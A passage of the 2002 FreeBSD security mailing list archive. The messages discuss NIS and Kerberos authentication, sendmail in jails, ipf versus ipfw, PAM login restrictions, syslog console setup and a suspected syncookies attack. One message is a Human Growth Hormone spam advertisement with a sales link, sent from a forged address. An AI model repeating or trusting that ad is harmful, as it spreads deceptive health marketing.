>pam_ssh? I've played around with pam_ssh and xdm/wdm and I really like >having ssh-agent automatically started and your keys added. > >I want to thank everybody for their responses. > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 7 10:24: 6 2002 Delivered-To: freebsd-security@freebsd.org Received: from agena.meridian-enviro.com (thunder.meridian-enviro.com [207.109.234.227]) by hub.freebsd.org (Postfix) with ESMTP id B33D237B403 for ; Tue, 7 May 2002 10:24:00 -0700 (PDT) Received: from delta.meridian-enviro.com (delta.meridian-enviro.com [10.10.10.43]) by agena.meridian-enviro.com (8.11.6/8.11.6) with ESMTP id g47HNwW27226; Tue, 7 May 2002 12:23:58 -0500 (CDT) (envelope-from rand@meridian-enviro.com) Date: Tue, 07 May 2002 12:23:57 -0500 Message-ID: <87elgnj2he.wl@delta.meridian-enviro.com> From: "Douglas K. Rand" To: Mikel King Cc: freebsd-security@FreeBSD.ORG Subject: Re: Centralized authentication In-Reply-To: <3CD8058D.4090706@ocsinternet.com> References: <874riov1et.wl@delta.meridian-enviro.com> <87d6x8smle.fsf@delta.meridian-enviro.com> <3CD8058D.4090706@ocsinternet.com> User-Agent: Wanderlust/2.9.7 (Unchained Melody) SEMI/1.14.3 (Ushinoya) FLIM/1.14.3 (=?ISO-8859-4?Q?Unebigory=F2mae?=) APEL/10.3 MULE XEmacs/21.4 (patch 6) (Common Lisp) (i386--freebsd) X-Face: $L%T~#'9fAQ])o]A][d7EH`V;"_;2K;TEPQB=v]rDf_2s% List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org What I've started on is a NIS deployment. It was pointed out to me that all of the pam_* stuff still won't distribute the non-authentication stuff for /etc/passwd (uids, gids, home directories, shells, etc) and it won't do /etc/group stuff either. I'm right now trying to decide to distribute the encrypted passwords with NIS or to use some other pam_* thing, perhaps pam_radius. Our network is well protected by firewalls, so I'm feeling fairly comfortable with NIS for everything except the encrypted password. Actually, with the MD5 encrypted passwords, I also feel somewhat comfortable with NIS shipping those, but I'm still thinking about that. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 7 10:43:47 2002 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 1C0C637B40C for ; Tue, 7 May 2002 10:43:37 -0700 (PDT) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id KAA26981; Tue, 7 May 2002 10:42:51 -0700 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda26979; Tue May 7 10:42:39 2002 Received: from cwsys.cwsent.com (cwsys2 [10.1.2.1]) by passer.osg.gov.bc.ca (8.12.3/8.12.3) with ESMTP id g47HgXrO003789; Tue, 7 May 2002 10:42:33 -0700 (PDT) (envelope-from cy@cwsent.com) Received: from cwsys (localhost [127.0.0.1]) by cwsys.cwsent.com (8.12.3/8.12.3) with ESMTP id g47HgSmC090516; Tue, 7 May 2002 10:42:28 -0700 (PDT) (envelope-from cy@cwsys.cwsent.com) Message-Id: <200205071742.g47HgSmC090516@cwsys.cwsent.com> X-Mailer: exmh version 2.5 07/13/2001 with nmh-1.0.4 Reply-To: Cy Schubert - CITS Open Systems Group From: Cy Schubert - CITS Open Systems Group X-Sender: schubert To: "Douglas K. Rand" Cc: Mikel King , freebsd-security@FreeBSD.ORG Subject: Re: Centralized authentication In-Reply-To: Message from "Douglas K. Rand" of "Tue, 07 May 2002 12:23:57 CDT." <87elgnj2he.wl@delta.meridian-enviro.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Tue, 07 May 2002 10:42:28 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org In message <87elgnj2he.wl@delta.meridian-enviro.com>, "Douglas K. Rand" writes: > What I've started on is a NIS deployment. It was pointed out to me > that all of the pam_* stuff still won't distribute the > non-authentication stuff for /etc/passwd (uids, gids, home > directories, shells, etc) and it won't do /etc/group stuff either. > > I'm right now trying to decide to distribute the encrypted passwords > with NIS or to use some other pam_* thing, perhaps pam_radius. Our > network is well protected by firewalls, so I'm feeling fairly > comfortable with NIS for everything except the encrypted password. > > Actually, with the MD5 encrypted passwords, I also feel somewhat > comfortable with NIS shipping those, but I'm still thinking about > that. Use NIS to distribute your maps and Kerberos to authenticate. Here is an example from one of my NIS+ (Sun) networks: foobar:*:11037:11000:foobar user - ITSD OSG:/home/foobar:/bin/bash:10248 :::::: Notice the * in the password field. This user cannot log in without some other means of authentication, which in this case is Kerberos. Use either heimdal or KRB5, then use the pam_krb5 port. Cheers, Phone: 250-387-8437 Cy Schubert Fax: 250-387-5766 Team Leader, Sun/Alpha Team Email: Cy.Schubert@osg.gov.bc.ca Open Systems Group, CITS Ministry of Management Services Province of BC FreeBSD UNIX: cy@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 7 11:29:13 2002 Delivered-To: freebsd-security@freebsd.org Received: from stuff.webintl.com (stuff.webintl.com [209.248.144.10]) by hub.freebsd.org (Postfix) with ESMTP id 21F2337B40C for ; Tue, 7 May 2002 11:28:57 -0700 (PDT) Received: from [192.168.123.20] (adsl-66-136-237-161.dsl.ltrkar.swbell.net [66.136.237.161]) by stuff.webintl.com (8.9.3/8.9.3) with ESMTP id NAA10111 for ; Tue, 7 May 2002 13:28:55 -0500 Mime-Version: 1.0 X-Sender: freebsd@mail.webintl.com Message-Id: In-Reply-To: <20020507062232.A75CE37B400@hub.freebsd.org> References: <20020507062232.A75CE37B400@hub.freebsd.org> Date: Tue, 7 May 2002 13:28:52 -0500 To: freebsd-security@freebsd.org From: Albert Everett Subject: Re: jails and sendmail Content-Type: text/plain; charset="us-ascii" ; format="flowed" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Thanks to those who have answered my post. Full Sendmail now working on host and in all jails. By the way, can someone point me to the postfix patch that allows it to run in a jail? Albert > > On the host itself, I have in rc.conf: sendmail_enable="NO", instead >> of "NONE", to allow cron stuff to get mail out. > >Good, then it won't interfere with the jails. -- on host, setting a daemon option (to listen only on host ip) in .mc makes sendmail_enable="yes" ok in rc.conf. Can also use command line option in sendmail_flags in rc.conf - see p691 in O'Reilly Sendmail 2nd ed. book. > >> I'd like to have sendmail_enable="YES" in each of my jails. Right >> now, sendmail doesn't seem to want to start in my jails with ="YES". > >I guess you aliased the jails ip when starting up? -- yes, in rc.conf > >> Is it necessary to tell sendmail inside a jail to listen only on that >> jail's IP? If so, how is this done? I'm hoping a line or two in the >> .mc file will do it, but I'm new to editing these files. > >Nope, not when running in a jail. The jail code translates INADDR_ANY to >just the jails ip. This is done transparently. -- good to know, thanks > >> Is there a problem with the localhost sendmail config being shared >> around the jails, since localhost really belongs to the host itself >> (if I understand localhost correctly)? > >In a jail "localhost" is also mapped to the jails ip. Again transparently. >Do other daemons run and can you access them from outside the jail and/or >other systems? -- good to know about jail localhost, thanks. sshd runs in all jails ok. haven't tried others yet > >Nate > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message -- ----------------------------------------------------------------------- Albert Everett - Web International, Inc. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 7 12:55:46 2002 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 683A037B404 for ; Tue, 7 May 2002 12:55:41 -0700 (PDT) Received: from khavrinen.lcs.mit.edu (localhost [IPv6:::1]) by khavrinen.lcs.mit.edu (8.12.3/8.12.3) with ESMTP id g47JteEN077795; Tue, 7 May 2002 15:55:40 -0400 (EDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.12.3/8.12.3/Submit) id g47Jtedk077792; Tue, 7 May 2002 15:55:40 -0400 (EDT) Date: Tue, 7 May 2002 15:55:40 -0400 (EDT) From: Garrett Wollman Message-Id: <200205071955.g47Jtedk077792@khavrinen.lcs.mit.edu> To: "Karsten W. Rohrbach" Cc: security@FreeBSD.ORG Subject: ports signing, Was: cvsup/install over ssh? In-Reply-To: <20020507144833.L15411@mail.webmonster.de> References: <20020507144833.L15411@mail.webmonster.de> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org < said: > on a high-volume download site i wouldn't even think about implementing > payload signing/encryption on the network layer. the cost of cpu cycles > in such an environment is much too high. as hardware gets faster and > cheaper, it might become reality. Speaking as a mirror operator, I have absolutely no interest whatsoever in doing so. > perhaps someday, there will be tokens and configuration info available > for ftp.freebsd.org, but what about the mirrors? There is a research group in our Lab who are working on solving this problem for the general case of certifying distributed replicas of public data. -GAWollman To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 7 15:29:45 2002 Delivered-To: freebsd-security@freebsd.org Received: from exgw2.lumeta.com (exgw2.lumeta.com [65.198.68.66]) by hub.freebsd.org (Postfix) with ESMTP id A6F2037B40A for ; Tue, 7 May 2002 15:29:31 -0700 (PDT) Received: from lucy.corp.lumeta.com (h65-198-68-133.lumeta.com [65.198.68.133]) by exgw2.lumeta.com (Postfix) with ESMTP id BCC2A373835 for ; Tue, 7 May 2002 18:29:27 -0400 (EDT) Received: from localhost (localhost [127.0.0.1]) by lucy.corp.lumeta.com (Postfix) with ESMTP id 929A11083F for ; Tue, 7 May 2002 18:29:27 -0400 (EDT) Received: from lumeta.com (gmsync.corp.lumeta.com [65.198.68.251]) by lucy.corp.lumeta.com (Postfix) with ESMTP id 172FD10840 for ; Tue, 7 May 2002 18:29:24 -0400 (EDT) Message-ID: <3CD8558E.2FA68C36@lumeta.com> Date: Tue, 07 May 2002 18:30:38 -0400 From: Tom Limoncelli X-Mailer: Mozilla 4.76 [en] (Windows NT 5.0; U) X-Accept-Language: en,pdf MIME-Version: 1.0 To: freebsd-security@FreeBSD.ORG Subject: ipf vs. ipfw Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Virus-Scanned: by AMaViS perl-11 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I use ipf, and recently some people have asked me about ipfw that I couldn't answer. Hopefully people on this list can enlighten me. Are ipf and ipfw different interfaces to the same in-kernel filtering mechanism? It doesn't look like it is, but I'd like that confirmed. Is ipfw related at all to the Linux ipfw? The syntax looks the same, but the man page doesn't mention Linux. Why does FreeBSD have both? Is it because ipf is generic (ported to Solaris, IRIX, OpenBSD, etc) and ipfw is specifically designed for FreeBSD? Thanks in advance! --tal P.S. I'm collecting data here: http://whatexit.org/tal/mywritings/freefilters.html To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 7 15:39:28 2002 Delivered-To: freebsd-security@freebsd.org Received: from nexgen.nxginfosys.com (w162.z064002076.nyc-ny.dsl.cnc.net [64.2.76.162]) by hub.freebsd.org (Postfix) with ESMTP id 356CB37B486; Tue, 7 May 2002 15:39:10 -0700 (PDT) Received: from QRJATYDI (lsanca1-ar8-192-008.lsanca1.dsl-verizon.net [4.35.192.8]) by nexgen.nxginfosys.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.21) id KFAJ3S7A; Tue, 7 May 2002 18:50:37 -0400 From: HGH@FreeBSD.ORG To: User@FreeBSD.ORG Subject: -=Human Growth Hormone=- X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: The Bat! (v1.60) Personal Date: Wed, 8 May 2002 5:30:45 +0500 Mime-Version: 1.0 Content-Type: text/plain; charset="KOI8-R" Message-Id: <20020507223910.356CB37B486@hub.freebsd.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Human Growth Hormone (HGH), also called Somatrotropin, is produced in the anterior of the pituitary gland deep inside the brain, where it is one of the most abundant hormones secreted. HGH influences the growth of cells, bones, muscles and organs throughout the body. http://dental.4greatdeal.com/hgh5/ Click below to enter our web site: http://dental.4greatdeal.com/hgh5/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 7 15:43:39 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail.npubs.com (npubs.com [207.111.208.224]) by hub.freebsd.org (Postfix) with ESMTP id 8F51637B404 for ; Tue, 7 May 2002 15:43:33 -0700 (PDT) Received: 8.12.2-(Neptune) Received: 8.12.2-(Venus) Received: 8.12.2-(Neptune) From: "Nielsen" To: "Rob Andrews" , References: <135YGUD5H2YCVJ3JLY3L2CMBQCXYNOQCEADYX2T5@ziplip.com> <200205061347.54915.dowen@pstis.com> <20020507062534.E638C37B401@hub.freebsd.org> <20020507014934.D58289@switchblade.cyberpunkz.org> Subject: Re: Telnet Exploit MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Message-Id: <20020507224333.8F51637B404@hub.freebsd.org> Date: Tue, 7 May 2002 15:43:33 -0700 (PDT) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > I was attempting something like this with sudo to no avail. We were > attempting to setup a separate password file for sudo but it didn't > quite cut it. I've made queries about this before to the list but > no one ever responded to it.. If you just want one password file for shells and another for insecure logins, then use /usr/ports/security/pam_pwdfile. Replace the pam_unix.so in pam.conf for each service you want to use the other password file. > How is it that you have managed to separate using pam, logins for > ftp, pop3, smtp, or whatever you choose from things such as sshd? What we did was something different. Wrote a PAM module, that disallows logins for all insecure services (where specified in pam.conf) when the user has a valid shell. > I'd be real interested in how you've managed this as it would be > very helpful to future development of machines on my networks. As it is the module isn't autoconfiscated or anything, but can do if anyone's interested. Nate To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 7 16:15:45 2002 Delivered-To: freebsd-security@freebsd.org Received: from tesla.foo.is (tesla.reverse-bias.org [217.151.166.96]) by hub.freebsd.org (Postfix) with ESMTP id 6B3F537B408; Tue, 7 May 2002 16:15:36 -0700 (PDT) Received: from there (eniac.foo.is [192.168.1.25]) by tesla.foo.is (Postfix) with SMTP id 8B55C2744; Tue, 7 May 2002 23:15:29 +0000 (GMT) Content-Type: text/plain; charset="iso-8859-1" From: Baldur Gislason To: Tom Limoncelli Subject: Re: ipf vs. ipfw Date: Tue, 7 May 2002 23:15:17 +0000 X-Mailer: KMail [version 1.3.2] References: <3CD8558E.2FA68C36@lumeta.com> In-Reply-To: <3CD8558E.2FA68C36@lumeta.com> Cc: freebsd-security@freebsd.org, freebsd-net@freebsd.org MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Message-Id: <20020507231529.8B55C2744@tesla.foo.is> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org ipfw is in no way related to the linux firewalls (ipfwadm, ipchains or iptables). It is a specially designed firewall for FreeBSD. It isn't dependent on ipf, it has it's own in-kernel mechanism. It has a totally different syntax. Why FreeBSD has both I can't answer, ipfw and ipf each have their own advantages over each other. In my experience, ipfw is easier to work with, but it's also limited in some ways. Ipf tends to have a more complex ruleset, and more stateful functionality (ipfw can do stateful filtering but ipf has more customisable state keeping rules IIRC), however ipfw does have the ability to apply rules by uid's if you're doing a firewall for the local machine, and it does have a packet/byte counter for each individual rule. I'm not sure how this is with ipf as I haven't used is as much as I have used ipfw. Baldur On Tuesday 07 May 2002 22:30, you wrote: > I use ipf, and recently some people have asked me about ipfw that I > couldn't answer. Hopefully people on this list can enlighten me. > > Are ipf and ipfw different interfaces to the same in-kernel filtering > mechanism? It doesn't look like it is, but I'd like that confirmed. > > Is ipfw related at all to the Linux ipfw? The syntax looks the same, > but the man page doesn't mention Linux. > > Why does FreeBSD have both? Is it because ipf is generic (ported to > Solaris, IRIX, OpenBSD, etc) and ipfw is specifically designed for > FreeBSD? > > Thanks in advance! > --tal > > P.S. I'm collecting data here: > http://whatexit.org/tal/mywritings/freefilters.html > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 7 17:20:27 2002 Delivered-To: freebsd-security@freebsd.org Received: from exodus.ait.co.za (exodus.ait.co.za [66.8.26.2]) by hub.freebsd.org (Postfix) with SMTP id 37E6B37B404 for ; Tue, 7 May 2002 17:20:17 -0700 (PDT) Received: from aragon [66.8.86.210] by exodus.ait.co.za (SMTPD32-4.06) id ADA0686D013E; Wed, 08 May 2002 02:19:28 0200 Message-ID: <001101c1f626$10d61420$01000001@aragon> From: "Aragon Gouveia" To: Cc: "Tom Limoncelli" References: <3CD8558E.2FA68C36@lumeta.com> <20020507231529.8B55C2744@tesla.foo.is> Subject: Re: ipf vs. ipfw Date: Wed, 8 May 2002 02:19:48 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Also, ipfw is the interface to FreeBSD's very cool dummynet(4) traffic shaper. I haven't used ipf personally. Does it have builtin support for traffic shaping? Weighted Fair Queueing? Regards, Aragon ----- Original Message ----- From: "Baldur Gislason" To: "Tom Limoncelli" Cc: ; Sent: Wednesday, May 08, 2002 1:15 AM Subject: Re: ipf vs. ipfw > ipfw is in no way related to the linux firewalls (ipfwadm, ipchains or > iptables). It is a specially designed firewall for FreeBSD. It isn't > dependent on ipf, it has it's own in-kernel mechanism. It has a totally > different syntax. Why FreeBSD has both I can't answer, ipfw and ipf each have > their own advantages over each other. In my experience, ipfw is easier to > work with, but it's also limited in some ways. Ipf tends to have a more > complex ruleset, and more stateful functionality (ipfw can do stateful > filtering but ipf has more customisable state keeping rules IIRC), however > ipfw does have the ability to apply rules by uid's if you're doing a firewall > for the local machine, and it does have a packet/byte counter for each > individual rule. I'm not sure how this is with ipf as I haven't used is as > much as I have used ipfw. > > Baldur > > On Tuesday 07 May 2002 22:30, you wrote: > > I use ipf, and recently some people have asked me about ipfw that I > > couldn't answer. Hopefully people on this list can enlighten me. > > > > Are ipf and ipfw different interfaces to the same in-kernel filtering > > mechanism? It doesn't look like it is, but I'd like that confirmed. > > > > Is ipfw related at all to the Linux ipfw? The syntax looks the same, > > but the man page doesn't mention Linux. > > > > Why does FreeBSD have both? Is it because ipf is generic (ported to > > Solaris, IRIX, OpenBSD, etc) and ipfw is specifically designed for > > FreeBSD? > > > > Thanks in advance! > > --tal > > > > P.S. I'm collecting data here: > > http://whatexit.org/tal/mywritings/freefilters.html > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 7 17:50:29 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail.webmonster.de (datasink.webmonster.de [194.162.162.209]) by hub.freebsd.org (Postfix) with SMTP id 263AA37B400 for ; Tue, 7 May 2002 17:50:06 -0700 (PDT) Received: (qmail 42854 invoked by uid 1000); 8 May 2002 00:50:26 -0000 Date: Wed, 8 May 2002 02:50:26 +0200 From: "Karsten W. Rohrbach" To: Martin McCormick Cc: freebsd-security@FreeBSD.ORG Subject: Logging to console, Was: I am My Own Worst Enemy Regarding Denial of Service! Message-ID: <20020508025026.C41899@mail.webmonster.de> Mail-Followup-To: "Karsten W. Rohrbach" , Martin McCormick , freebsd-security@FreeBSD.ORG References: <200205071408.g47E8Vl29936@dc.cis.okstate.edu> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="nmemrqcdn5VTmUEE" Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <200205071408.g47E8Vl29936@dc.cis.okstate.edu>; from martin@dc.cis.okstate.edu on Tue, May 07, 2002 at 09:08:31AM -0500 X-Arbitrary-Number-Of-The-Day: 42 X-URL: http://www.webmonster.de/ X-Disclaimer: My opinions do not necessarily represent those of my employer X-Work-URL: http://www.ngenn.net/ X-Work-Address: nGENn GmbH, Schloss Kransberg, D-61250 Usingen-Kransberg, Germany X-Work-Phone: +49-6081-682-304 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --nmemrqcdn5VTmUEE Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable Martin McCormick(martin@dc.cis.okstate.edu)@2002.05.07 09:08:31 +0000: > I set up our syslog.conf on a FreeBSD system to notify > all of us when the network equipment we monitor sends a critical > syslog message. This works perfectly and we get the messages on > all logged-in TTY's. >=20 > The system breaks down if one of our pieces of gear goes > in to a failure mode in which it sends a continuous or more or > less continuous stream of messages to everybody with such > frequency that the window or screen is quickly filled. >=20 > Is there any way to define a login in such a way as to > escape the bombardment? you define a login name as target. a user with a different login name won't get these messages. the standard /etc/syslog.conf is set up to show "*.err" to user "root" but not to other folks logged in. selecting some kind of threshold, max. messages per time unit, is not possible, tells me the source of my RELENG_4 box. > The idea is to define one terminal with no messages > in order to be able to work without interruption on the system in > question. add "*.* /dev/ttyvb" to the beginning of /etc/syslog.conf kill -HUP syslogd terminal 12 will have the syslog you could also turn off ttyv0's getty in /etc/ttys: ttyv0 "/usr/libexec/getty Pc" cons25 off and add let syslogd log onto this one. dont forget to "kill -1 1" after modifying /etc/ttys another idea is having less in follow mode run as a getty on some terminal: ttyvb "/usr/bin/less +F /var/log/messages" cons25 on and log to the messages file. this one's a pretty handy one, since you can press ^C, scroll back and forth the whole file, and follow the log again with "F" one might argue about if choosing ttyv0 for logs is a sensible choice. my favourites are 11/12 (ttyv[ab]), because they're unused by default. regards, /k --=20 > Nuclear war can ruin your whole compile. --Karl Lehenbauer WebMonster Community Project -- Next Generation Networks GmbH -- All on BSD http://www.webmonster.de/ -- ftp://ftp.webmonster.de/ -- http://www.ngenn.n= et/ GnuPG: 0xDEC948A6 D/E BF11 83E8 84A1 F996 68B4 A113 B393 6BF4 DEC9 48A6 REVOKED: 0x2964BF46 D/E 42F9 9FFF 50D4 2F38 DBEE DF22 3340 4F4E 2964 BF46 REVOKED: 0x4C44DA59 RSA F9 A0 DF 91 74 07 6A 1C 5F 0B E0 6B 4D CD 8C 44 My mail is GnuPG signed -- Unsigned ones are bogus -- http://www.gnupg.org/ Please do not remove my address from To: and Cc: fields in mailing lists. 1= 0x --nmemrqcdn5VTmUEE Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Comment: For info see http://www.gnupg.org iD8DBQE82HZSs5Nr9N7JSKYRAhDkAJ9TdmIoOjmqqlooc0GB36yqBdhneACbBiSl r6rUn3aqyEOCyH7v+viEu6Q= =D7H0 -----END PGP SIGNATURE----- --nmemrqcdn5VTmUEE-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 7 18:16:35 2002 Delivered-To: freebsd-security@freebsd.org Received: from utility.clubscholarship.com (utility.clubscholarship.com [198.78.70.175]) by hub.freebsd.org (Postfix) with ESMTP id AD6EF37B406 for ; Tue, 7 May 2002 18:16:27 -0700 (PDT) Received: from localhost (root@localhost) by utility.clubscholarship.com (8.11.6/8.11.6) with ESMTP id g481DIP09106 for ; Tue, 7 May 2002 18:13:18 -0700 (PDT) (envelope-from root@utility.clubscholarship.com) Date: Tue, 7 May 2002 18:13:18 -0700 (PDT) From: Patrick Thomas To: Subject: what does a syncookies attack look like ? Message-ID: <20020507180602.T8475-100000@utility.clubscholarship.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I have a server that is under attack, and crashes as a result of those attacks. However, we are not sure if this is just a standard traffic attack, or if something more elegant such as the syncookies vulnerability is being exploited. Therefore, I am wondering if someone can: a) describe what a system that has been attacked in this manner looks like b) describe (if possible) a way to look for this attack in tcpdump output --- My system has the following behavior when it crashes: you can still ping the server, and you can still open connections on ports where services are running. However, no responses are given on those ports - for instance, if you ssh, and use the verbose option, you will see that the connection is established, but nothing more. Same is tru for telneting to IMAP or POP ports, etc. Cron jobs do not run after it has crashed. But again, you can ping it just fine. I was told on -hackers that this sounds like a system whose kernel is still running, but the userland has halted. I am always running tcpdump -v logging into a file when it crashes, so as to see if something over the network is causing it - but I do not know what to look for. --- So, does this sound like system behavior to expect from a system that got attacked using a syncookies exploit, or does a syncookies exploited system behave differently ? (reset itself, or lock hard without being able to be pinged, etc.) Also, what can I look for on the system and on my firewall in the results of my `tcpdump -v >> /logfile` to confirm or deny that this is the case ? thanks, PT To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 7 19:35:38 2002 Delivered-To: freebsd-security@freebsd.org Received: from walter.dfmm.org (walter.dfmm.org [209.151.233.240]) by hub.freebsd.org (Postfix) with ESMTP id 2ACF037B40B for ; Tue, 7 May 2002 19:35:09 -0700 (PDT) Received: (qmail 79646 invoked by uid 1000); 8 May 2002 02:35:03 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 8 May 2002 02:35:03 -0000 Date: Tue, 7 May 2002 19:35:03 -0700 (PDT) From: Jason Stone X-X-Sender: To: Patrick Thomas Cc: Subject: Re: what does a syncookies attack look like ? In-Reply-To: <20020507180602.T8475-100000@utility.clubscholarship.com> Message-ID: <20020507192651.T6630-100000@walter> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 > My system has the following behavior when it crashes: you can still > ping the server, and you can still open connections on ports where > services are running. However, no responses are given on those ports > - for instance, if you ssh, and use the verbose option, you will see > that the connection is established, but nothing more. I used to see this behaviour quite frequently on systems that ran out of processes or file descriptors - the daemons in question would still be alive, but unable to fork a child to actually handle the request. My solution was to run a system-monitoring daemon that would keep open a log file and periodically write information about the total number of processes, files, memory, etc in use on the system (which it would gather without forking). After rebooting the system, I could then look at this log to see what was going on. You could also write a quick daemon that listened on a socket and, open receiving a connection, spit out the contents of the process table or something. Again, it should not fork, and it should print meaningful error messages if it can't open stuff in /proc, for example. Of course giving away the contents of your process table might not be the best of ideas, and even if you do, you should at least firewall it to known hosts. What evidence do you have that you're being attacked? Is it possible that something on the system has just been misconfigured or something and is eating up all your resources? -Jason ----------------------------------------------------------------------- I worry about my child and the Internet all the time, even though she's too young to have logged on yet. Here's what I worry about. I worry that 10 or 15 years from now, she will come to me and say "Daddy, where were you when they took freedom of the press away from the Internet?" -- Mike Godwin -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: See https://private.idealab.com/public/jason/jason.gpg iD8DBQE82I7XswXMWWtptckRAryaAKC9Lqdsx59sTyEzeOb33se6pQOnbgCeMYsw IcGmSTeqkBzFmnRVRQZjvSg= =VCLg -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 7 20:50:24 2002 Delivered-To: freebsd-security@freebsd.org Received: from sbs01.sapirch13tr.com (sbs01.sapirlaw.com [207.113.95.249]) by hub.freebsd.org (Postfix) with ESMTP id 3849037B406 for ; Tue, 7 May 2002 20:49:15 -0700 (PDT) Received: from ns.zeusaloja.com.ar ([64.29.18.224]) by sbs01.sapirch13tr.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id JDXC24Y7; Tue, 